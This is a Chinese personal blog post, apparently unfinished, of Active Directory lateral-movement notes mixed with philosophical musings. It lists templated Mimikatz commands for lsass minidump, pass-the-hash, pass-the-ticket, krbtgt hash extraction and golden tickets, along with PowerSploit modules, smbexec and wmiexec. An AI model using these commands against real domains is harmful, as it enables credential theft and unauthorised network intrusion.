<!DOCTYPE html>
<html lang="en,cn">
    <!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
  <meta name="color-scheme" content="light dark">
  
  <title>AD DC, 一点横向的笔记 - W.M.小姐的超链猫咖啡</title>
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    <link rel='manifest' href='/manifest.json'>
  

  
<link rel="stylesheet" href="/css/var.css">

  
<link rel="stylesheet" href="/css/main.css">

  
<link rel="stylesheet" href="/css/typography.css">

  
<link rel="stylesheet" href="/css/code-highlighting.css">

  
<link rel="stylesheet" href="/css/components.css">

  
<link rel="stylesheet" href="/css/nav.css">

  
<link rel="stylesheet" href="/css/paginator.css">

  
<link rel="stylesheet" href="/css/footer.css">

  
<link rel="stylesheet" href="/css/post-list.css">

  
<link rel="stylesheet" href="/css/waline.css">

  
  
  
<link rel="stylesheet" href="/css/post.css">

  

  
    
<script src="https://cdn.jsdelivr.net/npm/js-cookie@rc/dist/js.cookie.min.js"></script>
 
  

  
<meta name="generator" content="Hexo 5.4.0"></head>
    <body data-color-scheme="auto">
        <nav id="theme-nav">
    <div class="inner">
        <a class="title" href="/">Mrs.W.M.s&#39; Technomancer-Cat Coffee</a>
        <div class="nav-arrow"></div>
        <div class="nav-items">
            <a class="nav-item nav-item-home" href="/">Home</a>
            
            
            <a class="nav-item" href="/archives">Archives</a>
            
            
            
            <a class="nav-item" href="/friends">Friends</a>
            
            
            
            <a class="nav-item" href="/projects">Projects</a>
            
            
            
            <a class="nav-item" href="/about">About</a>
            
            
            
            <a class="nav-item nav-item-github nav-item-icon" href="https://github.com/Sup0rsonic" target="_blank">&nbsp;</a>
            
            
        </div>
    </div>
</nav>
        <article class="post">
    <div class="meta">
        
        <div class="date" id="date">
            
            
            
            
            
            
            
            
            
            
            <span>October</span>
            
            
            
            <span>28,</span>
            <span>2021</span>
        </div>
        

        <h2 class="title">AD DC, 一点横向的笔记</h2>
    </div>

    <div class="divider"></div>

    <div class="content">
        <h1 id="AD-DC-一点横向笔记。"><a href="#AD-DC-一点横向笔记。" class="headerlink" title="AD-DC,一点横向笔记。"></a>AD-DC,一点横向笔记。</h1><p>会更新的，如果我在那时还活着而且有心情摸鱼的话。<br>如果有横向笔记的话，竖向笔记作为一个概念的外延和实体化，<br>存在吗?</p>
<p>无论如何，我不会把所有东西统统一股脑丢在这篇文章里面。<br>有些内容值得一篇单独的文章，而另一些让我更倾向于选择-把它们留在心里。<br>所以我的记忆也不是那么差，对吧？</p>
<h5 id="PREFACE"><a href="#PREFACE" class="headerlink" title="PREFACE"></a>PREFACE</h5><p>​        所以我也许真的记不下来，那么就把这玩意当成笔记好了。激情是如此奇妙的东西，以致于我在这里写这些内容的时候竟无法停止睡觉，喝一杯咖啡或者打打游戏的冲动。人类是非理性的动物，我常说。</p>
<p>​        但是世界上有如此多的诱惑，和更多的fuck-ups.我要如何不因为这种简单的原因毁掉我的一天呢?</p>
<p>​        于是我又想到了时间，每个微秒间的微分函数和原子的震动。我感到迷茫，因为时间总是以如此的节律流逝，以发条钟的滴答声为节律流逝，以聚乙烯和聚乙烯的碰撞声为节律流逝，以白噪声信号的上升沿和下降沿为节律流逝，就如手中的沙和我口边的雾气，我可以感知，但又无法度量。我为时间而感到迷茫，我为一切可能性而感到迷茫，我为存在而感到迷茫，而这…</p>
<p>​        对天发誓(God forsaken)，我不想写下去了。</p>
<p>​        我想，这是对时间的一种浪费也是对过去的我的不尊重，但是我还是写着，写着，写着。</p>
<h5 id="CMDLets"><a href="#CMDLets" class="headerlink" title="CMDLets"></a>CMDLets</h5><p>“So let’s call it cmdlets, eh?”</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 我不会在这里写那些基础的玩意，反正你们知道AD是什么玩意，林是什么玩意域是什么玩意TGT是什么AS是什么Kerberos是什么。</span></span><br><span class="line"><span class="comment"># 我甚至不期待有什么人来看。</span></span><br><span class="line"><span class="comment"># 我只期待我能学到什么，或者记住什么。</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>So there’s this thing. We use all forms of digital or analog devices and turn them the extension of our memories.<br>And the machine has memories.<br>But where’s ours?</p>
<p>​        所以问题来了。我们用一切矢量与数码的设备作为我们的记忆外延。<br>​        所以机器拥有了记忆。<br>​        但是我们的记忆在哪里?</p>
<h5 id="TOOLs"><a href="#TOOLs" class="headerlink" title="TOOLs"></a>TOOLs</h5><p>“Those that goes downwards. Simplifies the job anyway.”</p>
<p>​        接下来是形而上和形而下。我们成那些形而下的存在为器，或者[工具]，然而器也有其形而上的用途。<br>​        而人类从更长的时间长河里，是某种工具。<br>​        我们是形而上的，还是形而下的，或者两者？</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Mimikatz</span></span><br><span class="line"><span class="comment"># 一件事情。这玩意在各种地方被乱杀成筛子，所以pypykatz+py2exe解决方案没准有用。你问我？我不擅长C++，而且不知道该写什么。</span></span><br><span class="line">	<span class="comment"># 我知道你们都知道怎么把lsass dump下来，找到ntlm，或者搞到明文密码了，对吧?</span></span><br><span class="line">	<span class="comment"># ...对吧?</span></span><br><span class="line"><span class="comment"># 但是不得不说，记下工具的命令而不是原理让我倍感堵得慌。给人一种&quot;我是skid&quot;的错觉。但是有多少&quot;so called security expert&quot;不是？而且我的C是真的拉胯。</span></span><br><span class="line"><span class="comment"># 我会发一篇关于类似&quot;发出一篇如何复刻mimikatz而且橄榄所有AV的文章有没有搞错&quot;之类的文章的。迟早。</span></span><br><span class="line">sekurlsa::minidump &#123;fname&#125; <span class="comment"># Switch to minidump</span></span><br><span class="line">sekurlsa::pth /user &#123;uname&#125; /domain &#123;domain_name&#125; /ntlm:&#123;ntlm&#125; /run:&#123;exec&#125; <span class="comment"># PTH. 它支持各种长度的ntlm,和aes256。</span></span><br><span class="line">sekurlsa::krbtgt <span class="comment"># Krbtgt Hash</span></span><br><span class="line">kerberos::ptt &#123;kirbi&#125; <span class="comment"># PTT。</span></span><br><span class="line">kerberos::golden /admin:&#123;admin_ame&#125; /domain:&#123;domain&#125; id:&#123;rid&#125; /sid:&#123;sid&#125; krbtgt:&#123;krb_hash&#125; /ptt <span class="comment"># Golden ticket</span></span><br><span class="line">ts::multirdp <span class="comment"># 使得一个RDP session可以被多个用户操作。</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Powersploit</span></span><br><span class="line"><span class="comment"># 在内网机器上的文件Invoke-Request系配合IEX也许很方便。Ignore me, I&#x27;m just hungry, and I don&#x27;t know what I&#x27;m talking about.</span></span><br><span class="line">O</span><br><span class="line"><span class="comment"># Metasploit(WHY?)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Invoke-WmiCommand</span></span><br><span class="line"><span class="comment"># Add-Persistance</span></span><br><span class="line"><span class="comment"># Invoke-TokenManipulation</span></span><br><span class="line"><span class="comment"># Set-CriticalProcess</span></span><br><span class="line"><span class="comment"># Powerup</span></span><br><span class="line"><span class="comment"># Invoke-Portscan</span></span><br><span class="line"><span class="comment"># Powerview</span></span><br><span class="line"><span class="comment"># Misc</span></span><br><span class="line">	<span class="comment">#票子。金票-&gt;TGT，银票-ST。 </span></span><br><span class="line">Ticker+py2exe系?</span><br><span class="line">smbexec</span><br><span class="line">wmiexec</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h5 id="Other"><a href="#Other" class="headerlink" title="Other"></a>Other</h5><p>困了，也许我会更新，也许我不会。</p>

    </div>

    <div class="about">
        <h1>About this Post</h1>
        <p>This post is written by Mitaka, licensed under <a
                target="_blank" rel="noopener" href="https://github.com/Sup0rsonic/IDGAFPL-WINTERMUTE-MOD/blob/main/LICENSE_CN">CC BY-NC-SA 4.0, or modded IDGAF License</a>.</p>
    </div>

    
        
    
</article>
        <footer>
    <div class="inner">
        <div class="links">
            
            <div class="group">
                <h4 class="title">Blog</h4>
                
                <a href="/" class="item">Blog</a>
                
                <a href="/archives" class="item">Archives</a>
                
                <a href="/friends" class="item">Friends</a>
                
                <a href="/projects" class="item">Projects</a>
                
                <a href="/resume" class="item">Resume</a>
                
                <a href="/about" class="item">About</a>
                
                <a href="/atom.xml" class="item">RSS</a>
                
            </div>
            
            <div class="group">
                <h4 class="title">Projects</h4>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/hexo-theme-cupertino" class="item">Hexo Theme Cupertino</a>
                
            </div>
            
            <div class="group">
                <h4 class="title">Me</h4>
                
                <a target="_blank" rel="noopener" href="https://github.com/Sup0rsonic" class="item">GitHub</a>
                
                <a href="mailto:1nt3rcepter@gmail.com" class="item">Email</a>
                
            </div>
            
        </div>
        <span>&copy; 2021 Mitaka<br >Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></span>
        
            <br>
            <div class="color-scheme-toggle" role="radiogroup" id="theme-color-scheme-toggle">
                <label>
                    <input type="radio" value="light">
                    <span>Light</span>
                </label>
                <label>
                    <input type="radio" value="dark">
                    <span>Dark</span>
                </label>
                <label>
                    <input type="radio" value="auto">
                    <span>Auto</span>
                </label>
            </div>
        
    </div>
</footer>


        
<script src="/js/main.js"></script>

        
    </body>
</html>